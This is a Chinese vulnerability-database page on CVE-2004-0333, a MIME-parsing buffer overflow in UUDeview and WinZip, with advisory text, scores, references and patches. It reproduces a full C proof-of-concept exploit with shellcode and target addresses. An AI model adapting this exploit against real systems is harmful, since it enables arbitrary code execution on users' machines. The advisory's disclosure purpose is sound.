CVE-2004-0333
CVSS10.0
发布时间 :2004-11-23 00:00:00
修订时间 :2008-09-10 15:25:52
NMCOES    

[原文]Buffer overflow in the UUDeview package, as used in WinZip 6.2 through WinZip 8.1 SR-1, and possibly other packages, allows remote attackers to execute arbitrary code via a MIME archive with certain long MIME parameters.


[CNNVD]WinZip MIME解析缓冲区溢出漏洞(CNNVD-200411-130)

        
        WinZip是Windows平台下的解压缩工具。
        WinZip中的函数在进行部分参数解析时存在问题,远程攻击者可以利用这个漏洞构建恶意压缩文档诱使用户处理,可能以WinZip进程权限在系统上执行任意指令。
        问题存在于UUDeview包中,此功能用于支持多个解码函数,当提供超长字符串给部分MIME档((.mim, .uue, .uu, .b64, .bhx, .hqx和.xxe扩展)参数,WinZip会出现"internal error in file misc.c line 132"而崩溃。精心构建恶意压缩档,当目标用户使用Winzip解析MIME时,可触发缓冲区溢出,可能以WinZip进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:gentoo:linux:1.4:rc1Gentoo Linux 1.4 rc1
cpe:/a:winzip:winzip:7.0WinZip 7.0
cpe:/o:gentoo:linux:1.4:rc2Gentoo Linux 1.4 rc2
cpe:/o:gentoo:linux:1.4Gentoo Linux 1.4
cpe:/a:uudeview:uudeview:0.5.19
cpe:/a:winzip:winzip:8.1:sr1WinZip 8.1 SR1
cpe:/a:winzip:winzip:8.0WinZip 8.0
cpe:/a:uudeview:uudeview:0.5.18
cpe:/a:openpkg:openpkgOpenPKG
cpe:/o:gentoo:linux:1.4:rc3Gentoo Linux 1.4 rc3
cpe:/a:winzip:winzip:8.1WinZip 8.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0333
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0333
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-130
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/116182
(VENDOR_ADVISORY)  CERT-VN  VU#116182
http://www.securityfocus.com/bid/9758
(VENDOR_ADVISORY)  BID  9758
http://xforce.iss.net/xforce/xfdb/15490
(UNKNOWN)  XF  uudeview-multiple-bo(15490)
http://xforce.iss.net/xforce/xfdb/15336
(VENDOR_ADVISORY)  XF  winzip-mime-bo(15336)
http://www.winzip.com/fmwz90.htm
(UNKNOWN)  CONFIRM  http://www.winzip.com/fmwz90.htm
http://www.osvdb.org/4119
(UNKNOWN)  OSVDB  4119
http://www.openpkg.org/security/OpenPKG-SA-2004.006-uudeview.html
(UNKNOWN)  CONFIRM  http://www.openpkg.org/security/OpenPKG-SA-2004.006-uudeview.html
http://www.idefense.com/application/poi/display?id=76&type=vulnerabiliti&flashstatus=true
(UNKNOWN)  IDEFENSE  20040227 WinZip MIME Parsing Buffer Overflow Vulnerability
http://www.ciac.org/ciac/bulletins/o-092.shtml
(UNKNOWN)  CIAC  O-092
http://secunia.com/advisories/11019
(UNKNOWN)  SECUNIA  11019
http://secunia.com/advisories/10995
(UNKNOWN)  SECUNIA  10995

- 漏洞信息

WinZip MIME解析缓冲区溢出漏洞
危急 边界条件错误
2004-11-23 00:00:00 2006-06-26 00:00:00
远程  
        
        WinZip是Windows平台下的解压缩工具。
        WinZip中的函数在进行部分参数解析时存在问题,远程攻击者可以利用这个漏洞构建恶意压缩文档诱使用户处理,可能以WinZip进程权限在系统上执行任意指令。
        问题存在于UUDeview包中,此功能用于支持多个解码函数,当提供超长字符串给部分MIME档((.mim, .uue, .uu, .b64, .bhx, .hqx和.xxe扩展)参数,WinZip会出现"internal error in file misc.c line 132"而崩溃。精心构建恶意压缩档,当目标用户使用Winzip解析MIME时,可触发缓冲区溢出,可能以WinZip进程权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        WinZip
        ------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        目前的WinZip 9.0已经修正此漏洞,建议用户下载使用:
        
        http://www.winzip.com/

- 漏洞信息 (272)

WinZIP MIME Parsing Overflow Proof of Concept Exploit (EDBID:272)
windows local
2004-04-15 Verified
0 snooq
N/A [点击下载]
/*
 *  Author: snooq       
 *  Date: 14 April 2004  
 *
 *  This is a PoC exploit for WinZip32 MIME Parsing Overflow
 *  bug reported by iDefense on 27 February 2004.
 *
 *  The original advisory is found here:
 *  http://www.idefense.com/application/poi/display?id=76
 *
 *  This version is SP dependent becoz my idiotic shellcode
 *  uses hardcoded addresses.... =p 
 *  
 *  So, test it locally only. Afterall, it's just a PoC rite?
 *  Nonetheless, it's possible to make it more portable by 
 *  using a universal shellcode... 
 *
 *  but beware... chars like <>,.:;'"=[]\/ are filtered...
 *  so feel free to XOR it.. =p
 *
 *  Notes
 *  =====
 *  1) Tested against WinZip 8.1 on WinXP SP1, Win2K SP1 only
 *
 *  2) You need to first launch WinZip before you 'Open'
 *
 *  3) Double clicking the 'uue' won't work 
 *     why so? go figure it out urself... =p 
 *     once u know why... u'd then know how to fix it...
 *
 *  Greetz
 *  ======
 *  # eugene, nam, jf, valmont and the rest..
 *  # sk, shashank + Security_Auditors folks...
 *  # iDefense folks... SiG^2 guys etc...
 *  # lastly.. Greg Hoglund for his 'Cross Page' stuffs... =p
 */

/*
 *  A snapshot of the 'crash'
 *  =========================
 *
 *  Our buffer on the heap looks like this:
 *  
 *  [....AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEEEEEEEEEEEEEEE....]
 *  |--- heap grows this way --------->
 *
 *   
 *  and the CPU is about to execute the following code:
 *
 *  0049BFFC  |> 8B4C13 08      MOV ECX,DWORD PTR DS:[EBX+EDX+8]
 *  0049C000  |. 8B7C13 04      MOV EDI,DWORD PTR DS:[EBX+EDX+4]
 *  0049C004  |. 8979 04        MOV DWORD PTR DS:[ECX+4],EDI
 *  0049C007  |. 8B4C13 04      MOV ECX,DWORD PTR DS:[EBX+EDX+4]
 *  0049C00B  |. 8B7C13 08      MOV EDI,DWORD PTR DS:[EBX+EDX+8]
 *  0049C00F  |. 035D F8        ADD EBX,DWORD PTR SS:[EBP-8]
 *  0049C012  |. 8979 08        MOV DWORD PTR DS:[ECX+8],EDI
 *  0049C015  |. 895D F4        MOV DWORD PTR SS:[EBP-C],EBX
 *
 *  and, EBX register seems to be under our control... =p
 *
 *  EDX = ptr to 'DDDD'	
 *  EBX = 'DDDD' - 1		
 *
 *  By carefully choosing a value for EBX, we are able to manipulate
 *  ECX at 0049BFFC and EDI at 0049C000.
 *
 *  If we set 'DDDD'=0xfffffff5 (-11), 
 *  
 *  -> EBX would be '0xfffffff4' (-12)
 *  -> [EBX+EDX+8] becomes [EDX-4] and ECX = 'CCCC'
 *  -> [EBX+EDX+4] becomes [EDX-8] and EDI = 'BBBB'
 *
 *  Effectively at 0049C004, we can write a DWORD 'BBBB' to ['CCCC'+4]
 *  After that.....
 *
 *  -> [EBX+EDX+4] becomes [EDX-8] and ECX = 'BBBB'
 *  -> [EBX+EDX+8] becomes [EDX-4] and EDI = 'CCCC' 
 *  
 *  Finally we reach MOV DWORD PTR DS:['BBBB'+8],'CCCC' at 0049C012..
 *
 *  Choosing the rite values for 'BBBB' + 'CCCC', execution flow could
 *  be reliably diverted into our shellcode.
 *
 *  In this exploit, I've chosen to install our code as the main thread's
 *  top exception handler so that when exception is triggered at 0049C012,
 *  our code will be called to 'handle' it... =p
 *
 *  This is how I did it but I'm not sure if this is the best way.
 *  If you know of any other better way to exploit this.....
 *  pleaseeeeee tell me....... :)
 *
 */

#include <windows.h>
#include <stdlib.h>
#include <stdio.h>

#define TARGET	1
#define NOP	0x90

/*
 * Gap for NOPs (not really needed)
 */
#define PAD	0		

/*
 * This 'RANGE' nonsense was useful
 * in locating the 'index', i.e. 'DDDD'
 */
#define RANGE	1*4		

/*
 * Where we control the 'index',
 * i.e EBX register's value
 */
#define IDXOFF	268-RANGE+4 

/*
 * We find our 'where' + 'what' here...
 */
#define OFFSET	IDXOFF-8	

/*
 * -12 bytes from 'index' into where
 * 'where'+'what' are...
 */
#define INDEX	0xfffffff5	 

#define BSIZE	1024
#define FNAME	"snooq.uue"
#define SSIZE	sizeof(shellcode)-1
#define HSIZE	sizeof(header)-1

char buff[BSIZE];
long where, what;

struct {
	char *os;
	long topSEH;
	long jmpADD;
}

targets[] = {
	{
		"Window XP (en) SP1",
		0x7ffddffe,	// Per Thread Top SEH - 2
		0xf27cffff  // [this address + 4] -> shellcode
	},
	{
		"Window 2000 (en) SP1",
		0x7ffddffe,	// Per Thread Top SEH - 2
		0xf354ffff  // [this address + 4] -> shellcode
	},
}, v;

/*
 * Harmless payload that spawns 'notepad.exe'... =p
 */

char shellcode[]=
	"\x55"					// push ebp 
	"\x8b\xec"				// mov ebp, esp
	"\x33\xf6"				// xor esi, esi
	"\x56"					// push esi
	"\x68\x2e\x65\x78\x65"	// push 'exe.'
	"\x68\x65\x70\x61\x64"	// push 'dape'
	"\x68\x90\x6e\x6f\x74"	// push 'ton'
	"\x46"					// inc esi		
	"\x56"					// push esi
	"\x8d\x7d\xf1"			// lea edi, [ebp-0xf]	
	"\x57"					// push edi		
	"\xb8XXXX"				// mov eax, XXXX -> WinExec()  
	"\xff\xd0"				// call eax
	"\x4e"					// dec esi
	"\x56"					// push esi
	"\xb8YYYY"				// mov eax, YYYY -> ExitProcess()  
	"\xff\xd0";				// call eax

char header[]="Content-Type: multipart/mixed; boundary=";

void err_exit(char *s)
{
	printf("%s\n",s);
	exit(0);
}

void filladdr()
{
	char *ptr;
	int i=0, index=INDEX, idxoff=IDXOFF;

	long addr1=(long)WinExec;
	long addr2=(long)ExitProcess;

	printf("-> WinExec() is at: 0x%08x\n",addr1);
	printf("-> ExitProcess() is at: 0x%08x\n",addr2);

	ptr=shellcode;

	while (*ptr!='\0') {
		if (*((long *)ptr)==0x58585858) {
			printf("-> Filling in WinExec at offset: %d\n",(ptr-shellcode));
			*((long *)ptr)=addr1;
		}
		if (*((long *)ptr)==0x59595959) {
			printf("-> Filling in ExitProcess at offset: %d\n",(ptr-shellcode));
			*((long *)ptr)=addr2;
		}
		ptr++;
	}

	ptr=buff+HSIZE+OFFSET;
	printf("-> 'what' == 0x%08x at offset %d\n",what,OFFSET);
	*((long *)ptr)=what;

	ptr+=4;
	printf("-> 'where' == 0x%08x at offset %d\n",where,OFFSET+4);
	*((long *)ptr)=where-4;

	ptr=buff+HSIZE+idxoff;

	for (;i<RANGE;i+=4) {
		printf("-> 'index' == 0x%08x at offset %d\n",index-i,idxoff+i);
		*((long *)(ptr+i))=index-i;
	}

}

void buildfile() 
{
	int i=0;

	FILE *fd;

	if ((fd=fopen(FNAME,"w"))==NULL) {
		err_exit("-> Failed to generate file...");
	}

	for(;i<sizeof(buff);) {
		fprintf(fd,"%c",buff[i++]);
	}

	fclose(fd);

	printf("-> '%s' generated....\n",FNAME);

}

int main(int argc, char *argv[]) 
{
	int i=0, t=TARGET;

	if (argc==2) { t=atoi(argv[1]); }

	where=targets[t-1].topSEH;
	what=targets[t-1].jmpADD;

	printf("\nWinZip32 MIME Parsing Overflow PoC, By Snooq [jinyean@hotmail.com]\n\n");

	memset(buff,NOP,BSIZE);
	printf("-> Generating 'uue' file for target #%d...\n",t);
	memcpy(buff,header,HSIZE);
	filladdr();
	memcpy(buff+HSIZE+IDXOFF+4+PAD,shellcode,SSIZE);
	buildfile();

	return 0;

}


// milw0rm.com [2004-04-15]
		

- 漏洞信息

4076
WinZip MIME Archive Parsing Overflow
Local Access Required Input Manipulation
Loss of Integrity

- 漏洞描述

A local overflow exists in WinZip. The overflow is triggered by a specially crafted archive file, which an attacker can use to cause arbitrary code execution resulting in a loss of confidentiality, integrity, and/or availability.

- 时间线

2004-02-27 2004-01-13
Unknow Unknow

- 解决方案

Upgrade to version 9.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

UUDeview MIME Archive Buffer Overrun Vulnerability
Boundary Condition Error 9758
Yes No
2004-02-27 12:00:00 2009-07-12 03:06:00
This issue was announced by iDEFENSE.

- 受影响的程序版本

WinZip WinZip 8.1 SR-1
WinZip WinZip 8.1
WinZip WinZip 8.0
WinZip WinZip 7.0
UUDeview UUDeview 0.5.19
+ OpenPKG OpenPKG 2.0
UUDeview UUDeview 0.5.18
+ OpenPKG OpenPKG 1.3
OpenPKG OpenPKG Current
Gentoo Linux 1.4 _rc3
Gentoo Linux 1.4 _rc2
Gentoo Linux 1.4 _rc1
Gentoo Linux 1.4
WinZip WinZip 9.0
UUDeview UUDeview 0.5.20
Convert-UUlib Convert-UUlib 1.0.1
+ UUDeview UUDeview 0.5.20
Convert-UUlib Convert-UUlib 1.0
+ UUDeview UUDeview 0.5.20

- 不受影响的程序版本

WinZip WinZip 9.0
UUDeview UUDeview 0.5.20
Convert-UUlib Convert-UUlib 1.0.1
+ UUDeview UUDeview 0.5.20
Convert-UUlib Convert-UUlib 1.0
+ UUDeview UUDeview 0.5.20

- 漏洞讨论

A buffer overrun vulnerability has been reported in UUDeview. This issue exists in the MIME parsing routines.

It is reported that this issue may be exploited via a malicious MIME archive that specifies excessively long strings for various parameters. This could be exploited to execute arbitrary code on a system in the context of a user who opens a malicious MIME archive using the UUDeview program.

It should be noted that UUDeview is shipped as a component of WinZip.

- 漏洞利用

The reporters of this vulnerability possess proof-of-concept exploit code that is not publicly available or known to be circulating in the wild.

The following exploit has been provided by snooq to leverage this issue against WinZip on Windows 2000 and XP with SP1:

- 解决方案

UUDeview has released an updated version to address this issue.

This issue has been addressed in WinZip 9.0. Users are strongly urged to upgrade.

Gentoo Linux have released an advisory (200403-05) and updates to address this issue. Gentoo users are advised to upgrade to UUDeview 0.5.20 by emerging the updated packages as follows:
# emerge sync
# emerge -pv ">=app-text/uudeview-0.5.20"
# emerge ">=app-text/uudeview-0.5.20"

OpenPKG have released a security advisory (OpenPKG-SA-2004.006) and fixes to address this issue. Please see referenced advisory for further details.


UUDeview UUDeview 0.5.18

UUDeview UUDeview 0.5.19

WinZip WinZip 7.0

WinZip WinZip 8.0

WinZip WinZip 8.1 SR-1

WinZip WinZip 8.1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站